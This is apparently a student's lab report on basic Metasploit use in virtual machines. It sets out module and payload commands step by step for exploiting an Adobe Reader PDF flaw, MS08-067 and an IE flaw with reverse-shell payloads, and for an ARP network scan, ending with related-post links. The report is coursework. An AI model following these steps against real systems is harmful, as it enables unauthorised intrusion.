20145205武钰_Exp5 MSF基础应用

实验后回答问题

  • exploit:这个词本身只是利用,但是它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。但是对我来说这个词就是一个简单的指令执行词,就是个指令代码,并没有什么特别的,就是我们需要在MSF中进行执行了,敲一下就好。

  • payload:其实吧我对这个词理解不深,就感觉是我们的恶意代码要在靶机中可以做的事情,其实就是我们生产的恶意代码具体可以干什么。

  • encode:在我们学习了英语后我们都知道“en”是一个动词,所以encode就是对于我们之前的恶意代码进行一个再编译的过程,达到我们的目的——免杀

实验感想

  • 我们这个的实验是用已经被修补的漏洞,然后我们只是在前人的基础上感受了一把通过微软漏洞进行的攻击的感觉,只要我们平时及时下载补丁,修补我们的漏洞,其实黑客是很难对我们进行漏洞的渗透攻击的,而且我们也要注意上网习惯,注意一些的奇怪的域名,小心被“钓鱼“,而且我感觉这次实验的实际步骤应该是先进行局域网内的端口扫描,获得目标靶机的IP地址,之后进行主动攻击,获得目标机的权限,之后或是传输到靶机生产的PDF文件,或是将靶机的浏览器主页换成我们的钓鱼网页都是可以的。

  • 还有就是为了找到一个和大家不相同的漏洞,本来是想在MSF里直接搜一个挑个来做的,但是密密麻麻的英文让我退却了,然后就在百度上自己随便输了个漏洞年号,之后去看常用的搜索项,也是佩服我自己的聪明才智。

实践过程记录

Adobe阅读器渗透攻击

实验准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3

  • 首先在实验前我们可以打开KALI中的显示隐藏文件夹,或是我们不打开显示隐藏文件,可以使用我们的之前实验中用到的netcat进行传输。

  • 还要注意的一点是保证两台虚拟机可以ping通,无论是nat还是桥接通了就可以,为了ping通的话需要关闭防火墙。

实验步骤

  • 在kali终端中开启msfconsole
  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing进入该漏洞模块
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷
  • 输入命令show options显示模块设定参数,然后按照我们自己的情况进行修改
  • 在设定完成后,生产PDF文件,然后将PDF文件拖入到靶机中,之后就像是我们之前做的恶意代码实验一样。
  • 建立一个监听模块,use exploit/multi/handler
  • 使用set payload windows/meterpreter/reverse_tcp建立一个可靠的反弹链接,监听模块的端口也是需要我们按照自己的情况进行设定的。
  • 最后exploit开启监听模块在靶机中打开问题PDF,即可获得靶机权限。
  • 但是这种方式靶机那边的PDF并不会打开,就像是程序崩溃的感觉一样,但是如果关闭了问题PDF文件,靶机同kali的链接就会中断,而且我们也可以通过网络资源发现靶机正在和kali进行链接。

MS08_067漏洞渗透攻击实践

实验准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3
  • 预先设置虚拟机网络,保证两台虚拟机间可以ping通。

实验过程

  • 首先我们在知道了具体的漏洞号之后,在进行MSF后,输入search ms08_067,会显示出找到的渗透模块,如下图所示:

  • 输入use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用,在输入命令时时不时TAB一下会省很多功夫,建议没事多点一下TAB
  • 之后依然是设置有效攻击载荷,输入set payload generic/shell_reverse_tcp进入载荷模块,之后show options查看具体参数,然后修改参数。
  • 这里我们需要注意点的一点是,LHOST是本机地址,RHOST是靶机IP,设置好后,输入我们的开启攻击的号角exploit
  • 对比可知我们获得了靶机的管理员权限

IE浏览器渗透攻击——MS11030安全漏洞

实验准备

  • 两台虚拟机,其中一台为kali,一台为windows 7,浏览器版本为IE 8
  • 预先设置虚拟机网络,保证两台虚拟机间可以ping通。

实验过程

  • 首先进入漏洞模块,因为我们已知漏洞号之间进行漏洞模块,进入之后显示一下参数,然后根据我们的自身情况设置一下参数
  • 这里我们设置的错误路径为baidu.com,端口自己随意就好,尽量不要和已知使用端口占用进行冲突,然后我们设置攻击载荷。
  • 还是老套路,根据自己kali情况设置本地IP和端口,之后输入exploit启动漏洞服务,等待靶机那个“一个不小心”输入了一长串我们的钓鱼网址
  • 这时在靶机的浏览器中输入http://kali ip:port/uripath也就是输入对应的我们上面设置的参数
  • 稍作等待,kali这边就会有成功链接的反应
  • 之后输入sessions查看一下MSF中的会话情况,找到我们和win7的会话编号
  • 输入sessions -i 会话ID进入我们要进入的会话中,就会发现我们以后获取了靶机的权限

  • 这是我们win 7的IP地址

辅助模块的实践

实验前准备

  • 将kali机的模式改为桥接模式,因为这个在实际应用中最好我们可以使用公网地址,虽然这样会被抓,或是在无线局域网中使用桥接模式,可以保证和其他在这个局域网中的主机在同一个网段中,可以ping通。
  • 本次实验是实践一下两种进行网络中对于其他主机扫描的辅助模块
  • 为了提升一下扫描速度,我们可以预先建立msf数据库,在kali的终端中依次输入以下命令service postgresql start之后输入msfdb start
  • 然后进入msf
  • 输入use auxiliary/scanner/discovery/arp_sweep进入模块,然后输入show options查看并修改参数
  • 然后根据自身的情况修改参数
  • 然后就可以开始扫描了了,因为是辅助模块,并没有进行漏洞渗透攻击,所以我们的启动指令是run,然后可以看到这个局域网中除了自己的主机,其他的主机,因为我当时只开了kali,所以只会扫描到我的win 10主机
  • 在确认可以ping通后,使用nmap进行开放端口扫描,探知该主机开放的端口和服务

20145205武钰_Exp5 MSF基础应用的更多相关文章

  1. 20145218张晓涵_Exp5 MSF基础应用

    20145218张晓涵_Exp5 MSF基础应用 实验原理 MS08-067漏洞描述 MS08-067漏洞的全称为"Windows Server服务RPC请求缓冲区溢出漏洞",如果 ...

  2. 20145205 武钰 《网络对抗》Exp8 Web基础

    一点题外话 本次实验我三号完成的,由于一些原因吧,一直没发博客,拖到了现在,这里说就是评判一下自己的懒惰. 实验后问题回答 (1)什么是表单 表单在网页中主要负责数据采集功能. 一个表单有三个基本组成 ...

  3. 20145205武钰《网络对抗》web安全基础实践

    实验后问题回答 (1)SQL注入攻击原理,如何防御 攻击原理:SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的 防御手 ...

  4. 20165223《网络对抗技术》Exp5 MSF基础应用

    目录 -- MSF基础应用 实验说明 实验任务内容 基础问题回答 实验内容 主动攻击 ms17_10_eternalblue(成功) ms17_10_psexec(成功) ms08_067_netap ...

  5. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  6. 20155324 实验5 MSF基础应用

    20155324 实验5 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 服务器信息块(SMB)是一个网络文件共享协议,它允许应用程序和终端用户从远端的 ...

  7. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  8. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  9. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

随机推荐

  1. 为什么JS事件函数里面都有一个参数(ev)?

    因为ev是事件的参数啊!在ev中包含了事件触发时的参数,比如click事件的ev中包含着.e.pageX,e.pageY,keydown事件中包含着ev.keyCode等,在ie中,ev是全局的可以通 ...

  2. 《机器学习实战》第3章决策树程序清单3-1 计算给定数据集的香农熵calcShannonEnt()运行过程

    from math import log def calcShannonEnt(dataSet): numEntries = len(dataSet) print("样本总数:" ...

  3. Making the Grade---poj3666(dp)

    题目链接:http://poj.org/problem?id=3666 题意:有一个n个数的序列a,现在要把这些序列变成单调增的或者单调减的序列 b , 其价值为|A1 - B1| + |A2 - B ...

  4. 聊一聊Linux中的工作队列2

    上一篇文章对工作队列原理以及核心数据结构做了简单介绍,本文重点介绍下workqueue的创建以及worker的管理. 一.工作队列的创建(__alloc_workqueue_key) struct w ...

  5. 16 jmeter中的监听器以及测试结果分析

    常用监听器 断言结果.查看结果树.聚合报告.Summary Report.用表格查看结果.图形结果.aggregate graph等 指标分析 -Samples:本次场景中一共完成了多少请求-Aver ...

  6. react-native run-android error: unknown host service

    D:\rnworkspace\Hello>react-native run-android JS server already running.Running D:\Android\sdk/pl ...

  7. vuex使用

    1.装包:npm install vuex -S 2.引入:import Vuex from 'vuex'      //这些都是写在man.js中 3.加载到Vue中:Vue.use(Vuex) 4 ...

  8. 用python参加Kaggle的些许经验总结(收藏)

    Step1: Exploratory Data Analysis EDA,也就是对数据进行探索性的分析,一般就用到pandas和matplotlib就够了.EDA一般包括: 每个feature的意义, ...

  9. 【设置】Nginx配置文件具体配置解释

    #定义Nginx运行的用户和用户组 user www www; #nginx进程数,建议设置为等于CPU总核心数. worker_processes 8; #全局错误日志定义类型,[ debug | ...

  10. VS2010/MFC编程入门之三十七(工具栏:工具栏的创建、停靠与使用)

    鸡啄米在上一节教程中讲了工具栏资源及CToolBar类,本节继续讲解工具栏的相关知识,主要内容包括工具栏的创建.停靠与使用. 工具栏的使用 上一节中鸡啄米提到过,一般情况下工具栏中的按钮在菜单栏中都有 ...